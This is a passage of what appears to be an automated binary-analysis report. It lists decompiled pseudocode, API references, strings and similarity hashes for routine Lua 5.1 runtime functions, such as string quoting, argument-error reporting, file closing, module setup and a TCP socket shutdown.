				if( *_t48 >= _t47) {
					E1000F9E0(_t53, _t48);
					_t50 = _t50 + 4;
				}
				 *((char*)( *_t48)) = 0x22;
				 *_t48 =  *_t48 + 1;
				_t19 = _a12;
				_a12 = _t19 - 1;
				if(_t19 != 0) {
					do {
						if( *_t35 > 0x5c) {
							L12:
							__eflags =  *_t48 - _t47;
							if(__eflags >= 0) {
								E1000F9E0(__eflags, _t48);
								_t50 = _t50 + 4;
							}
							 *((char*)( *_t48)) =  *_t35;
							goto L15;
						} else {
							switch( *((intOrPtr*)(0 +  &M10015E80))) {
								case 0:
									E1000FAC0(__esi, "\\000", 4);
									goto L16;
								case 1:
									_t56 =  *_t48 - _t47;
									if( *_t48 >= _t47) {
										E1000F9E0(_t56, _t48);
										_t50 = _t50 + 4;
									}
									 *((char*)( *_t48)) = 0x5c;
									_t40 =  *_t48 + 1;
									 *_t48 = _t40;
									_t57 = _t40 - _t47;
									if(_t40 >= _t47) {
										E1000F9E0(_t57, _t48);
										_t50 = _t50 + 4;
									}
									 *((char*)( *_t48)) =  *_t35;
									L15:
									 *_t48 =  *_t48 + 1;
									goto L16;
								case 2:
									E1000FAC0(__esi, "\\r", 2);
									goto L16;
								case 3:
									goto L12;
							}
						}
						L16:
						_t27 = _a12;
						_t35 = _t35 + 1;
						_a12 = _t27 - 1;
					} while (_t27 != 0);
				}
				_t60 =  *_t48 - _t47;
				if( *_t48 >= _t47) {
					E1000F9E0(_t60, _t48);
				}
				 *((char*)( *_t48)) = 0x22;
				_t23 =  *_t48 + 1;
				 *_t48 = _t23;
				return _t23;
			}

0x10015d92
0x10015d97
0x10015d9b
0x10015d9d
0x10015da2
0x10015da8
0x10015daa
0x10015dad
0x10015db2
0x10015db2
0x10015db7
0x10015dbd
0x10015dbf
0x10015dc8
0x10015dcc
0x10015dd2
0x10015dd8
0x10015e3b
0x10015e3b
0x10015e3d
0x10015e40
0x10015e45
0x10015e45
0x10015e4c
0x00000000
0x10015dda
0x10015de2
0x00000000
0x10015e31
0x00000000
0x00000000
0x10015de9
0x10015deb
0x10015dee
0x10015df3
0x10015df3
0x10015df8
0x10015dfd
0x10015e00
0x10015e02
0x10015e04
0x10015e07
0x10015e0c
0x10015e0c
0x10015e13
0x10015e4e
0x10015e4e
0x00000000
0x00000000
0x10015e1f
0x00000000
0x00000000
0x00000000
0x00000000
0x10015de2
0x10015e50
0x10015e50
0x10015e54
0x10015e5a
0x10015e5a
0x10015dd2
0x10015e64
0x10015e66
0x10015e69
0x10015e6e
0x10015e74
0x10015e79
0x10015e7a
0x10015e7e

APIs

luaL_checklstring.LUA5.1(?,?,?,?,?,?,10015C59,?,?,?), ref: 10015D92

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_prepbuffer.LUA5.1(?,?,?,?), ref: 10015DAD
luaL_prepbuffer.LUA5.1(?,?,?,?,?,?,?), ref: 10015DEE
luaL_prepbuffer.LUA5.1(?,?,?,?,?,?,?), ref: 10015E07
luaL_addlstring.LUA5.1(?,1001A7FC,00000002,?,?,?,?,?,?,?,?), ref: 10015E1F

Part of subcall function 1000FAC0: luaL_prepbuffer.LUA5.1(?,?,00000000,?,?,1000FB2D,?,?,?,?,1000F8CA,?,?), ref: 1000FAE5

luaL_prepbuffer.LUA5.1(?,?,?,?), ref: 10015E69

Strings

\000, xrefs: 10015E2B

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_prepbuffer.$L_addlstring.L_checklstring.lua_tolstring.
String ID: \000
API String ID: 3458495320-2104200393
Opcode ID: 3d0b7893424607cb0cf0170e3f3892618733047cb5ce06df026c3627ec06eedb
Instruction ID: 13f3fef87bbffa1f16c8957a5ece2b07bfd2e1eb9ba3208073122bd9f54bd34d
Opcode Fuzzy Hash: 3d0b7893424607cb0cf0170e3f3892618733047cb5ce06df026c3627ec06eedb
Instruction Fuzzy Hash: D931D6B4604641DFD726CF18D88191677E1EF5A341B28046CF4C4CF312EA32EA81C792

Uniqueness

Uniqueness Score: -1.00%

Function 1000F090, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000F090(void* __ebx, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _v92;
				char* _v96;
				char _v100;
				intOrPtr* _t20;
				char* _t21;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr _t39;
				char* _t43;

				_t41 = _a4;
				if(E10003F40(_a4, 0,  &_v100) != 0) {
					E10004130(_t41, "n",  &_v100);
					_t20 = _v92;
					_t43 = "method";
					while(1) {
						_t37 =  *_t20;
						_t33 = _t37;
						if(_t37 !=  *_t43) {
							break;
						}
						if(_t33 == 0) {
							L7:
							_t20 = 0;
						} else {
							_t39 =  *((intOrPtr*)(_t20 + 1));
							_t35 = _t39;
							if(_t39 != _t43[1]) {
								break;
							} else {
								_t20 = _t20 + 2;
								_t43 =  &(_t43[2]);
								if(_t35 != 0) {
									continue;
								} else {
									goto L7;
								}
							}
						}
						L9:
						if(_t20 != 0) {
							L12:
							_t21 = _v96;
							if(_t21 == 0) {
								_t21 = "?";
								_v96 = _t21;
							}
							_push(_a12);
							_push(_t21);
							return E1000F230(_t41, "bad argument #%d to \'%s\' (%s)", _a8);
						} else {
							_t25 = _a8 - 1;
							_a8 = _t25;
							if(_t25 != 0) {
								goto L12;
							} else {
								_push(_a12);
								return E1000F230(_t41, "calling \'%s\' on bad self (%s)", _v96);
							}
						}
						goto L15;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L9;
				} else {
					_push(_a12);
					return E1000F230(_t41, "bad argument #%d (%s)", _a8);
				}
				L15:
			}

0x1000f098
0x1000f0aa
0x1000f0d6
0x1000f0db
0x1000f0e2
0x1000f0e7
0x1000f0e7
0x1000f0eb
0x1000f0ef
0x00000000
0x00000000
0x1000f0f3
0x1000f10b
0x1000f10b
0x1000f0f5
0x1000f0f5
0x1000f0fb
0x1000f0ff
0x00000000
0x1000f101
0x1000f101
0x1000f104
0x1000f109
0x00000000
0x00000000
0x00000000
0x00000000
0x1000f109
0x1000f0ff
0x1000f114
0x1000f118
0x1000f142
0x1000f142
0x1000f148
0x1000f14a
0x1000f14f
0x1000f14f
0x1000f157
0x1000f158
0x1000f170
0x1000f11a
0x1000f11e
0x1000f11f
0x1000f123
0x00000000
0x1000f125
0x1000f12d
0x1000f141
0x1000f141
0x1000f123
0x00000000
0x1000f118
0x1000f10f
0x1000f111
0x00000000
0x1000f0ac
0x1000f0b4
0x1000f0c8
0x1000f0c8
0x00000000

APIs

lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

lua_getinfo.LUA5.1(?,100191FC,?), ref: 1000F0D6
luaL_error.LUA5.1(?,calling '%s' on bad self (%s),?,?), ref: 1000F135

Strings

bad argument #%d to '%s' (%s), xrefs: 1000F15E
bad argument #%d (%s), xrefs: 1000F0B6
calling '%s' on bad self (%s), xrefs: 1000F12F
method, xrefs: 1000F0E2

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.$L_where.lua_concat.lua_error.lua_getinfo.lua_getstack.lua_pushvfstring.
String ID: bad argument #%d (%s)$bad argument #%d to '%s' (%s)$calling '%s' on bad self (%s)$method
API String ID: 1244025476-4026621142
Opcode ID: 66aa83ca107ef80076e869b20a4959eb95b75c7a429f7f8e45b6d56deaac4c2e
Instruction ID: b5dd571823f414a7805d71d0f2912eee8439f5c73e54a18a9bc8e8f9818f6705
Opcode Fuzzy Hash: 66aa83ca107ef80076e869b20a4959eb95b75c7a429f7f8e45b6d56deaac4c2e
Instruction Fuzzy Hash: 6D2178B9904281AFE300CA28CC82CFB77E8EFC56C4F45491CF9C487305E322D845A752

Uniqueness

Uniqueness Score: -1.00%

Function 100128D0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
stringCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E100128D0(void* __eflags, intOrPtr _a4) {
				int* _t5;
				int* _t6;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t19;
				void* _t20;

				_t18 = _a4;
				_t17 =  *((intOrPtr*)(E10001810(__eflags, _t18, 0xffffd8ed)));
				_t20 = _t19 + 8;
				_t26 = _t17;
				if(_t17 == 0) {
					_push("file is already closed");
					_push(_t18);
					E1000F230();
					_t20 = _t20 + 8;
				}
				_t5 = E10012720(_t26, _t18, _t17);
				if(( *(_t17 + 0xc) & 0x00000020) == 0) {
					__eflags = _t5;
					if(__eflags == 0) {
						_t6 = E100016C0(__eflags, _t18, 0xffffd8ec);
						__eflags = _t6;
						if(_t6 != 0) {
							E10001160(_t18, 0);
							E100013D0(__eflags, _t18, 0xffffd8ed);
							E10012040(_t18);
						}
						__eflags = 0;
						return 0;
					} else {
						return 1;
					}
				} else {
					__imp___errno();
					return E1000F230(_t18, "%s", strerror( *_t5));
				}
			}

0x100128d1
0x100128e1
0x100128e3
0x100128e6
0x100128e8
0x100128ea
0x100128ef
0x100128f0
0x100128f5
0x100128f5
0x100128fa
0x10012908
0x1001292b
0x1001292d
0x1001293d
0x10012945
0x10012947
0x1001294c
0x10012957
0x1001295d
0x10012962
0x10012966
0x10012969
0x10012930
0x10012936
0x10012936
0x1001290a
0x1001290a
0x1001292a
0x1001292a

APIs

lua_touserdata.LUA5.1(?,FFFFD8ED), ref: 100128DC
luaL_error.LUA5.1(?,file is already closed), ref: 100128F0

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

_errno.MSVCRT ref: 1001290A
strerror.MSVCRT ref: 10012913
luaL_error.LUA5.1(?,10019E90,00000000), ref: 10012920
lua_toboolean.LUA5.1(?,FFFFD8EC), ref: 1001293D
lua_settop.LUA5.1(?,00000000), ref: 1001294C
lua_pushvalue.LUA5.1(?,FFFFD8ED,?,00000000), ref: 10012957

Strings

file is already closed, xrefs: 100128EA

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_error.$L_where._errnolua_concat.lua_error.lua_pushvalue.lua_pushvfstring.lua_settop.lua_toboolean.lua_touserdata.strerror
String ID: file is already closed
API String ID: 4087978438-1126627374
Opcode ID: c5d9c95f9f9450221b9adf0bc1077d294abf3df60d25e77f02cfc2f0db3864e3
Instruction ID: abf3bd5a7bee9dcb129aa79dfc50d1ceaa03e764a2b3f8a9bd2f37a36f72d66e
Opcode Fuzzy Hash: c5d9c95f9f9450221b9adf0bc1077d294abf3df60d25e77f02cfc2f0db3864e3
Instruction Fuzzy Hash: BC01207E90452037D602E36CBC01FDF229CDF46291F050024F8049B152F734F69281FA

Uniqueness

Uniqueness Score: -1.00%

Function 10016A90, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 40
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016A90(void* __eflags, intOrPtr _a4, char* _a8) {
				char* _t7;
				void* _t12;
				char* _t13;

				_t18 = __eflags;
				_t14 = _a4;
				E100013D0(__eflags, _a4, 0xffffffff);
				E10001DD0(_t12, _t18, _a4, 0xfffffffe, "_M");
				_t13 = _a8;
				E10001980(_t12, _a4, _t13);
				E10001DD0(_t12, _t18, _t14, 0xfffffffe, "_NAME");
				_t7 = strrchr(_t13, 0x2e);
				if(_t7 != 0) {
					_t8 =  &(_t7[1]);
					__eflags =  &(_t7[1]);
				} else {
					_t8 = _t13;
				}
				E10001930(_t14, _t13, _t8 - _t13);
				return E10001DD0(_t12, _t8 - _t13, _t14, 0xfffffffe, "_PACKAGE");
			}

0x10016a90
0x10016a91
0x10016a99
0x10016aa6
0x10016aab
0x10016ab1
0x10016abe
0x10016ac6
0x10016ad1
0x10016ad7
0x10016ad7
0x10016ad3
0x10016ad3
0x10016ad3
0x10016add
0x10016af4

APIs

lua_pushvalue.LUA5.1(?,000000FF,00000001,?,100169DC,?,00000000,?,000000FE), ref: 10016A99
lua_setfield.LUA5.1(?,000000FE,1001AA3C,?,000000FF,00000001,?,100169DC,?,00000000,?,000000FE), ref: 10016AA6

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

lua_pushstring.LUA5.1(?,?,?,000000FE,1001AA3C,?,000000FF,00000001,?,100169DC,?,00000000,?,000000FE), ref: 10016AB1

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

lua_setfield.LUA5.1(?,000000FE,_NAME,?,?,?,000000FE,1001AA3C,?,000000FF,00000001,?,100169DC,?,00000000,?), ref: 10016ABE
strrchr.MSVCRT ref: 10016AC6
lua_pushlstring.LUA5.1(?,?,00000001), ref: 10016ADD
lua_setfield.LUA5.1(?,000000FE,_PACKAGE,?,?,00000001), ref: 10016AEA

Strings

_PACKAGE, xrefs: 10016AE2
_NAME, xrefs: 10016AB6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$S_newlstr.lua_pushlstring.lua_pushnil.lua_pushstring.lua_pushvalue.strrchr
String ID: _NAME$_PACKAGE
API String ID: 3374504982-110922768
Opcode ID: 8094f916a67623ed60a9d12a531134ac805ad218586956c52cfd9c193eb14ca6
Instruction ID: faca8b48c1debe266a38c1564b4e11895dcc9dcaead775864db8f0f90f340db0
Opcode Fuzzy Hash: 8094f916a67623ed60a9d12a531134ac805ad218586956c52cfd9c193eb14ca6
Instruction Fuzzy Hash: 74F0E53911947531A402E62A2E05EDF159EDFC76F0F640305F530750D6DB24F68282EB

Uniqueness

Uniqueness Score: -1.00%

Function 100160E0, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100160E0(intOrPtr _a4) {
				void* _t10;
				void* _t15;

				_t11 = _a4;
				E10001C70(_a4, 0, 1);
				E10001930(_t11, 0x1001ab10, 0);
				E100013D0(_t15, _t11, 0xfffffffe);
				E10001F20(_t15, _t11, 0xfffffffe);
				E10001160(_t11, 0xfffffffe);
				E100013D0(_t15, _t11, 0xfffffffe);
				E10001DD0(_t10, _t15, _t11, 0xfffffffe, "__index");
				return E10001160(_t11, 0xfffffffe);
			}

0x100160e1
0x100160ea
0x100160f7
0x100160ff
0x10016107
0x1001610f
0x10016117
0x10016124
0x10016138

APIs

lua_createtable.LUA5.1(?,00000000,00000001,?,100160D5,?,?,000000FE,gfind,?,000000FF,gmatch,?,string,100179B8), ref: 100160EA
lua_pushlstring.LUA5.1(?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?,000000FE,gfind,?,000000FF,gmatch,?), ref: 100160F7

Part of subcall function 10001930: luaS_newlstr.LUA5.1(?,?,?), ref: 1000195A

lua_pushvalue.LUA5.1(?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?,000000FE,gfind,?,000000FF), ref: 100160FF
lua_setmetatable.LUA5.1(?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?,000000FE,gfind), ref: 10016107
lua_settop.LUA5.1(?,000000FE,?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5,?,?), ref: 1001610F
lua_pushvalue.LUA5.1(?,000000FE,?,000000FE,?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000,00000001,?,100160D5), ref: 10016117
lua_setfield.LUA5.1(?,000000FE,__index,?,000000FE,?,000000FE,?,000000FE,?,000000FE,?,1001AB10,00000000,?,00000000), ref: 10016124

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

lua_settop.LUA5.1(?,000000FE), ref: 1001612F

Strings

__index, xrefs: 1001611C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: S_newlstr.lua_pushvalue.lua_settop.$lua_createtable.lua_pushlstring.lua_setfield.lua_setmetatable.
String ID: __index
API String ID: 3436426435-4084755486
Opcode ID: da38087793a74b0b6ea6fbc193ebaab02bbbaaa17a43cc865835a7ea531c6670
Instruction ID: 08eb729dde67d6604e699908d1fe3c82f31e89e52f1a6f2e5bd92a64cfa20caf
Opcode Fuzzy Hash: da38087793a74b0b6ea6fbc193ebaab02bbbaaa17a43cc865835a7ea531c6670
Instruction Fuzzy Hash: BEE07E7955E93A31E816A2283E02FCE100B8F876F0F340310B632355EA9E99729201AE

Uniqueness

Uniqueness Score: -1.00%

Function 100119A0, Relevance: 15.1, APIs: 10, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E100119A0(void* __edi, void* __eflags, void* __fp0, intOrPtr _a4, signed int* _a8) {
				void* _t10;
				signed int _t13;
				signed int* _t20;
				void* _t30;

				_t30 = __eflags;
				_t22 = _a4;
				E10001B10(_a4, 0x10017648);
				E10001BF0(_t30, __fp0, _a4, 0xffffd8f0);
				E10001B10(_a4, _t22);
				E10001BF0(_t30, __fp0, _t22, 0xfffffffe);
				_t10 = E10001410(_t30, _t22, 0xffffffff);
				if(_t10 != 6) {
					return _t10;
				} else {
					_t20 = _a8;
					E10001980( *((intOrPtr*)(0x1001764c +  *_t20 * 4)), _t22,  *((intOrPtr*)(0x1001764c +  *_t20 * 4)));
					_t13 = _t20[5];
					if(_t13 < 0) {
						E100018C0(_t22);
						return E10002070(_t22, 2, 0);
					}
					_push(_t13);
					E10001910(__fp0, _t22);
					return E10002070(_t22, 2, 0);
				}
			}

0x100119a0
0x100119a1
0x100119ab
0x100119b6
0x100119bd
0x100119c5
0x100119cd
0x100119d8
0x10011a2a
0x100119da
0x100119db
0x100119ea
0x100119ef
0x100119f8
0x10011a14
0x00000000
0x10011a26
0x100119fa
0x100119fc
0x10011a12
0x10011a12

APIs

lua_pushlightuserdata.LUA5.1(?,10017648), ref: 100119AB
lua_rawget.LUA5.1(?,FFFFD8F0,?,10017648), ref: 100119B6
lua_pushlightuserdata.LUA5.1(?,?,?,FFFFD8F0,?,10017648), ref: 100119BD
lua_rawget.LUA5.1(?,000000FE,?,?,?,FFFFD8F0,?,10017648), ref: 100119C5
lua_type.LUA5.1(?,000000FF,?,000000FE,?,?,?,FFFFD8F0,?,10017648), ref: 100119CD
lua_pushstring.LUA5.1(?), ref: 100119EA

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

lua_pushinteger.LUA5.1(?,?), ref: 100119FC
lua_call.LUA5.1(?,00000002,00000000), ref: 10011A09
lua_pushnil.LUA5.1(?), ref: 10011A14
lua_call.LUA5.1(?,00000002,00000000), ref: 10011A21

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_call.lua_pushlightuserdata.lua_pushnil.lua_rawget.$lua_pushinteger.lua_pushstring.lua_type.
String ID:
API String ID: 4161049710-0
Opcode ID: 793501407c85824faa1923577aff12b3f376e3adb8a81d6425b713906a4a5b97
Instruction ID: 3e247b8ed3a20bf993764acaaf308fbebb6560ad03b73f0ae156f4f17c68ebdf
Opcode Fuzzy Hash: 793501407c85824faa1923577aff12b3f376e3adb8a81d6425b713906a4a5b97
Instruction Fuzzy Hash: CF018C7994AA2236E401E6187C13FCF325DDF422E4F140614F4146629BFB25BB9281EB

Uniqueness

Uniqueness Score: -1.00%

Function 00991EF0, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 122
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00991EF0(intOrPtr _a4) {
				intOrPtr* _t8;
				void* _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				void* _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				char* _t35;
				char* _t36;
				intOrPtr* _t37;
				intOrPtr* _t38;
				void* _t39;
				void* _t40;

				_t34 = _a4;
				_t8 = E00991200(_t34, "tcp{client}", 1);
				_push(0);
				_push("both");
				_push(2);
				_push(_t34);
				_t38 = _t8;
				L00994B78();
				_t40 = _t39 + 0x1c;
				_t19 =  *_t8 - 0x62;
				if(_t19 == 0) {
					_t35 = "both";
					while(1) {
						_t28 =  *_t8;
						_t20 = _t28;
						if(_t28 !=  *_t35) {
							break;
						}
						if(_t20 == 0) {
							L26:
							_t8 = 0;
						} else {
							_t29 =  *((intOrPtr*)(_t8 + 1));
							_t21 = _t29;
							if(_t29 != _t35[1]) {
								break;
							} else {
								_t8 = _t8 + 2;
								_t35 =  &(_t35[2]);
								if(_t21 != 0) {
									continue;
								} else {
									goto L26;
								}
							}
						}
						L28:
						if(_t8 == 0) {
							_push(2);
							goto L31;
						} else {
							goto L29;
						}
						goto L33;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L28;
				} else {
					_t22 = _t19 - 0x10;
					if(_t22 == 0) {
						_t36 = "receive";
						while(1) {
							_t30 =  *_t8;
							_t23 = _t30;
							if(_t30 !=  *_t36) {
								break;
							}
							if(_t23 == 0) {
								L17:
								_t8 = 0;
							} else {
								_t31 =  *((intOrPtr*)(_t8 + 1));
								_t24 = _t31;
								if(_t31 != _t36[1]) {
									break;
								} else {
									_t8 = _t8 + 2;
									_t36 =  &(_t36[2]);
									if(_t24 != 0) {
										continue;
									} else {
										goto L17;
									}
								}
							}
							L19:
							if(_t8 != 0) {
								goto L29;
							} else {
								_push(_t8);
								goto L31;
							}
							goto L33;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L19;
					} else {
						if(_t22 != 1) {
							L32:
							_push(0x3ff00000);
							_push(0);
							_push(_t34);
							L00994B5A();
							return 1;
						} else {
							_t37 = 0x996274;
							while(1) {
								_t32 =  *_t8;
								_t26 = _t32;
								if(_t32 !=  *_t37) {
									break;
								}
								if(_t26 == 0) {
									L8:
									_t8 = 0;
								} else {
									_t33 =  *((intOrPtr*)(_t8 + 1));
									_t27 = _t33;
									if(_t33 !=  *((intOrPtr*)(_t37 + 1))) {
										break;
									} else {
										_t8 = _t8 + 2;
										_t37 = _t37 + 2;
										if(_t27 != 0) {
											continue;
										} else {
											goto L8;
										}
									}
								}
								L10:
								if(_t8 != 0) {
									L29:
									_push("invalid shutdown method");
									_push(2);
									_push(_t34);
									L00994B2A();
									return 0;
								} else {
									_push(1);
									L31:
									_push(_t38);
									E009941E0();
									_t40 = _t40 + 8;
									goto L32;
								}
								goto L33;
							}
							asm("sbb eax, eax");
							asm("sbb eax, 0xffffffff");
							goto L10;
						}
					}
				}
				L33:
			}

0x00991ef4
0x00991f00
0x00991f05
0x00991f07
0x00991f0c
0x00991f0e
0x00991f0f
0x00991f11
0x00991f19
0x00991f1c
0x00991f1f
0x00991fa7
0x00991fac
0x00991fac
0x00991fb0
0x00991fb4
0x00000000
0x00000000
0x00991fb8
0x00991fd0
0x00991fd0
0x00991fba
0x00991fba
0x00991fc0
0x00991fc4
0x00000000
0x00991fc6
0x00991fc6
0x00991fc9
0x00991fce
0x00000000
0x00000000
0x00000000
0x00000000
0x00991fce
0x00991fc4
0x00991fd9
0x00991fdb
0x00991ff4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00991fdb
0x00991fd4
0x00991fd6
0x00000000
0x00991f25
0x00991f25
0x00991f28
0x00991f6e
0x00991f73
0x00991f73
0x00991f77
0x00991f7b
0x00000000
0x00000000
0x00991f7f
0x00991f97
0x00991f97
0x00991f81
0x00991f81
0x00991f87
0x00991f8b
0x00000000
0x00991f8d
0x00991f8d
0x00991f90
0x00991f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00991f95
0x00991f8b
0x00991fa0
0x00991fa2
0x00000000
0x00991fa4
0x00991fa4
0x00000000
0x00991fa4
0x00000000
0x00991fa2
0x00991f9b
0x00991f9d
0x00000000
0x00991f2a
0x00991f2b
0x00991fff
0x00991fff
0x00992004
0x00992006
0x00992007
0x00992018
0x00991f31
0x00991f31
0x00991f36
0x00991f36
0x00991f3a
0x00991f3e
0x00000000
0x00000000
0x00991f42
0x00991f5a
0x00991f5a
0x00991f44
0x00991f44
0x00991f4a
0x00991f4e
0x00000000
0x00991f50
0x00991f50
0x00991f53
0x00991f58
0x00000000
0x00000000
0x00000000
0x00000000
0x00991f58
0x00991f4e
0x00991f63
0x00991f65
0x00991fdd
0x00991fdd
0x00991fe2
0x00991fe4
0x00991fe5
0x00991ff3
0x00991f67
0x00991f67
0x00991ff6
0x00991ff6
0x00991ff7
0x00991ffc
0x00000000
0x00991ffc
0x00000000
0x00991f65
0x00991f5e
0x00991f60
0x00000000
0x00991f60
0x00991f2b
0x00991f28
0x00000000

APIs

Part of subcall function 00991200: sprintf.MSVCRT ref: 0099122F
Part of subcall function 00991200: luaL_argerror.LUA5.1(?,?,?), ref: 0099123C

luaL_optlstring.LUA5.1(?,00000002,both,00000000,?,tcp{client},00000001), ref: 00991F11
luaL_argerror.LUA5.1(?,00000002,invalid shutdown method), ref: 00991FE5
lua_pushnumber.LUA5.1(?,00000000,3FF00000), ref: 00992007

Strings

both, xrefs: 00991F07, 00991FA7
receive, xrefs: 00991F6E
send, xrefs: 00991F31
tcp{client}, xrefs: 00991EFA
invalid shutdown method, xrefs: 00991FDD

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
